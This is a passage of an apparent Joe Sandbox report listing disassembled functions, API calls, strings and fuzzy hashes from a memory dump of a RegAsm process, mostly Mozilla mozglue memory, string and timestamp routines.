LoadLibraryW.KERNEL32(wintrust.dll,?,6C7577F6), ref: 6C7AC248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C7AC267
FreeLibrary.KERNEL32(?,6C7577F6), ref: 6C7AC27C

Strings

wintrust.dll, xrefs: 6C7AC243
CryptCATAdminAcquireContext, xrefs: 6C7AC261

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 2c5cb4249460311c3b54c7d8d63aae792e8216e1a264be336f1a642f3fa54b5b
Instruction ID: 757ee3b648f3851d0c7414125e72a34e9b1f81a3a50bf23a48c27373e327468a
Opcode Fuzzy Hash: 2c5cb4249460311c3b54c7d8d63aae792e8216e1a264be336f1a642f3fa54b5b
Instruction Fuzzy Hash: 4CE09275200207AFDF086FA38A887027AF8E70B70AF504135EA05D2641E7B192409B54

Function 6C7ABAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6C7505BC), ref: 6C7ABAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C7ABAD7
FreeLibrary.KERNEL32(?,6C7505BC), ref: 6C7ABAEC

Strings

kernelbase.dll, xrefs: 6C7ABAB3
VirtualAlloc2, xrefs: 6C7ABAD1

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 341ed642ad124d694e4501398d734c61eefcff9a8dd22abe29aeb82fe38677c2
Instruction ID: 955a09a89e634bc9c15b904133b69db72d877179dc08f1945aa5916dd8b0f7da
Opcode Fuzzy Hash: 341ed642ad124d694e4501398d734c61eefcff9a8dd22abe29aeb82fe38677c2
Instruction Fuzzy Hash: 7AE0B6713017879FEF009F63CA987057FFCA706704F14413AB90482600EBB4A3049B11

Function 6C7AC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C7577C5), ref: 6C7AC298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C7AC2B7
FreeLibrary.KERNEL32(?,6C7577C5), ref: 6C7AC2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6C7AC2B1
wintrust.dll, xrefs: 6C7AC293

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 5e19fc8a64dcbb3f4a8ed9399314b8df0421eaaab2bfb37ee4bcbe04d64e09f9
Instruction ID: 1232af9bb11cbd42b70aa02a2db49ad82276b60b62e63b1223171c2d136ca670
Opcode Fuzzy Hash: 5e19fc8a64dcbb3f4a8ed9399314b8df0421eaaab2bfb37ee4bcbe04d64e09f9
Instruction Fuzzy Hash: 3EE0B674343307AFDF017FAACA487027FFCEB06745F444135AA0582A50E7B59200CB55

Function 6C7ABE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C7ABE49), ref: 6C7ABEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C7ABEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C7ABE49), ref: 6C7ABF38
RtlReAllocateHeap.NTDLL ref: 6C7ABF83
RtlFreeHeap.NTDLL(6C7ABE49,00000000), ref: 6C7ABFA6

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: dc808ff0f4cc9866960d73273519c1b11c497a4b748e46d1f1883ff68fe2f059
Instruction ID: 8adcc39e338eb7596b3a7deffa06fdf8f88c5d1a71a02bc319e3688f592c075f
Opcode Fuzzy Hash: dc808ff0f4cc9866960d73273519c1b11c497a4b748e46d1f1883ff68fe2f059
Instruction Fuzzy Hash: 95516271A002098FE714CFA9CE80B9AB7A6FF89314F298639D555A7B55D730F9078B80

Function 6C798E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C78B58D,?,?,?,?,?,?,?,6C7BD734,?,?,?,6C7BD734), ref: 6C798E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C78B58D,?,?,?,?,?,?,?,6C7BD734,?,?,?,6C7BD734), ref: 6C798EBF
free.MOZGLUE(?,?,?,?,6C78B58D,?,?,?,?,?,?,?,6C7BD734,?,?,?), ref: 6C798F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C78B58D,?,?,?,?,?,?,?,6C7BD734,?,?,?,6C7BD734), ref: 6C798F46
free.MOZGLUE(?,?,?,?,6C78B58D,?,?,?,?,?,?,?,6C7BD734,?,?,?), ref: 6C798F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C78B58D,?,?,?,?,?,?,?,6C7BD734,?,?,?), ref: 6C798F8F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 89bbef2d6457a61c55f9279a3b1c8d8d576de46cb049ad51f1196f8c50ef4bb9
Instruction ID: a80fade78f73fcbf183d2b74398122cfd0df1883845472d0322ecaff78108c19
Opcode Fuzzy Hash: 89bbef2d6457a61c55f9279a3b1c8d8d576de46cb049ad51f1196f8c50ef4bb9
Instruction Fuzzy Hash: BA5191B1A012168FEB14CF64E98066E73B7BF44318F15053AD917ABB41E731FA05CB91

Function 6C7560E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7560F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C756180
free.MOZGLUE(?,?,?,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C756211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C756229
free.MOZGLUE(?,?,?,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C75625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C755FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C756271

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: a694622c4f1a30209f9256e33a03acf6419689ec625f00e31f12d427a9f27d84
Instruction ID: 466d73314bc797ecf04e4dad0b1921a67863047d3b81a6324f53b86d64bcf036
Opcode Fuzzy Hash: a694622c4f1a30209f9256e33a03acf6419689ec625f00e31f12d427a9f27d84
Instruction Fuzzy Hash: B351A2B1A002068FEB14CF68D9807AEB7B5EF45348F54443DC616D7712EB31EA64CB91

Function 6C7927E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C792620,?,?,?,6C7860AA), ref: 6C79284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C792620,?,?,?,6C7860AA), ref: 6C79289A
free.MOZGLUE(?,?,?,6C792620,?,?,?,6C7860AA), ref: 6C7928F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C792620,?,?,?,6C7860AA), ref: 6C792910
free.MOZGLUE(00000001,?,?,6C792620,?,?,?,6C7860AA), ref: 6C79293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C792620,?,?,?,6C7860AA), ref: 6C79294E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 3334063cb95392f83083af18359bf4d1271b3d1d69adef4df65411cf22ada4f1
Instruction ID: 14f54f3e293ac4e2437270bb2982bb0fccf92ef5547d2d4a253e1d5401797117
Opcode Fuzzy Hash: 3334063cb95392f83083af18359bf4d1271b3d1d69adef4df65411cf22ada4f1
Instruction Fuzzy Hash: A141F2B1A002068FEB10DF68E98876A77F6FF45318F240939D556EB741E731E904CBA1

Function 6C74CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C74D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C74D139

Strings

MOZ_CRASH(), xrefs: 6C74D187

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: f23824489858f9c079ad7e65ed60ee6b8788715bf14d92045850ebcd7ac6b7d4
Instruction ID: d278713778ab36efaeb336bcf414dfc91bfea4d4ef26ce91488816fd1a33410b
Opcode Fuzzy Hash: f23824489858f9c079ad7e65ed60ee6b8788715bf14d92045850ebcd7ac6b7d4
Instruction Fuzzy Hash: 8F41F032B0021B8FCB04CEBCCE9636A36B4EB59750F154139E958E7784E7B19D108BD9

Function 6C744DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C744E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C744E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C744EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C744F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C744F1E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: bc9ec20eb2b9fe04fac9afa1aebb04fdb8e28e726573333197d063bb0afbc3f4
Instruction ID: 0e05828829d7c92b5d02fea5262cbee31eb467c3377f1837cf49ad8fe14082f5
Opcode Fuzzy Hash: bc9ec20eb2b9fe04fac9afa1aebb04fdb8e28e726573333197d063bb0afbc3f4
Instruction Fuzzy Hash: DD41DE716087059FC701CF29C98095BB7E8BF8A344F14CA2DF96697B41DB30E958EB92

Function 6C78D210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C78D21F
moz_xmalloc.MOZGLUE(00000001), ref: 6C78D22E

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C78D242
free.MOZGLUE(00000000), ref: 6C78D253

Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C78D280

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: a4813098ff8c713b8d58dfe7d88e8bb9a968b86de0b6fb6f177c932a0f081cd8
Instruction ID: 59d4d1fea116a7508ea066a895fd113a314d4f0aa6e3d7640f5e836cedb089b0
Opcode Fuzzy Hash: a4813098ff8c713b8d58dfe7d88e8bb9a968b86de0b6fb6f177c932a0f081cd8
Instruction Fuzzy Hash: 26310B759012169FCB00CF58CA84AAEBB75FF99308F248176DA14AB701D772EC06C7E5

Function 6C75C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C75C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C75C1DC

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 6d013d54e75081a38e7dab5b38d6fdd9f7afa1c22505e6eb070f9c54997e16cd
Instruction ID: 9de7ea7c33b0e0206068f9a79059301a47bd41aaff28c42d000f1989ec1a4b6d
Opcode Fuzzy Hash: 6d013d54e75081a38e7dab5b38d6fdd9f7afa1c22505e6eb070f9c54997e16cd
Instruction Fuzzy Hash: 4F41C4B1D083448FD710DF64D68579AB7F4BF89308F40856DE8989B712E730D958CB92

Function 6C7AA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C7CF770), ref: 6C7AA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7AA87B

Part of subcall function 6C7AA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C7AA88F,00000000), ref: 6C7AA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C7AA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7AA90C
LeaveCriticalSection.KERNEL32(6C7CF770), ref: 6C7AA97E

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 67a174228d2890978bcbca985aab9566d6fee25f903c4bcedebaea6883efa855
Instruction ID: a083cc3ca71181fcc8a17e2c91c724d643cf01db0f780aa4fb5c702d80518f45
Opcode Fuzzy Hash: 67a174228d2890978bcbca985aab9566d6fee25f903c4bcedebaea6883efa855
Instruction Fuzzy Hash: 4241A2B0E002058FDB00DFE4C989ADDBB74FF08324F108629E816AB781D7319946CF92

Function 6C751530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C75159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C7515BC
moz_xmalloc.MOZGLUE(-00000001,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C7515E7
free.MOZGLUE(?,?,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C751606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C751637

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: acc5c5b71ed7c09814360470b47f203a203f233a69361036a71fad54d2c76d76
Instruction ID: 00323db2e438b86139106da5cdab825b8d2b443b2a4a2d49e44bedc68afb5435
Opcode Fuzzy Hash: acc5c5b71ed7c09814360470b47f203a203f233a69361036a71fad54d2c76d76
Instruction Fuzzy Hash: 7A310872A001048BCB188E78DA5446E77A9FB853657A50B2DE823DBBD5EF30D9248792

Function 6C744310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6C7442D2), ref: 6C74436A

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7442D2), ref: 6C744387
moz_xmalloc.MOZGLUE(80000023,?,6C7442D2), ref: 6C7443B7
free.MOZGLUE(00000000,?,6C7442D2), ref: 6C7443EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C7442D2), ref: 6C744406

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: dd5e2e8d5d669e6cc8e4456f64df1974e276f0ad5cb63d8f47440503159ab7f0
Instruction ID: 78d68c7ce2ed4655147c795a413c7984863268d2cd279218b8fea229bc2ee51c
Opcode Fuzzy Hash: dd5e2e8d5d669e6cc8e4456f64df1974e276f0ad5cb63d8f47440503159ab7f0
Instruction Fuzzy Hash: F1313B72A001158FD714DE789E8456EB7AAEF45764B144F39E815EBB81EB30ED00A392

Function 6C7AAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAD9D

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE01
GetLastError.KERNEL32(?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE3D

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 4f060cd4d6137cca0490e643277be09b282c8cb38e4c7b422b31cefb8c5e2264
Instruction ID: 990dea73faedc9b79131d0ada17ead00cfbb0d4039988b9f5127165fe4853b37
Opcode Fuzzy Hash: 4f060cd4d6137cca0490e643277be09b282c8cb38e4c7b422b31cefb8c5e2264
Instruction Fuzzy Hash: 273164B1A002159FDB50DF758D49AABBBF8EF48665F15843DE84AE7700E734E804CBA0

Function 6C7A0B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A0BBC

Part of subcall function 6C765C50: GetTickCount64.KERNEL32 ref: 6C765D40
Part of subcall function 6C765C50: EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A0BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A0BD5

Part of subcall function 6C765C50: __aulldiv.LIBCMT ref: 6C765DB4
Part of subcall function 6C765C50: LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C765DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A0BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7A0C9A

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

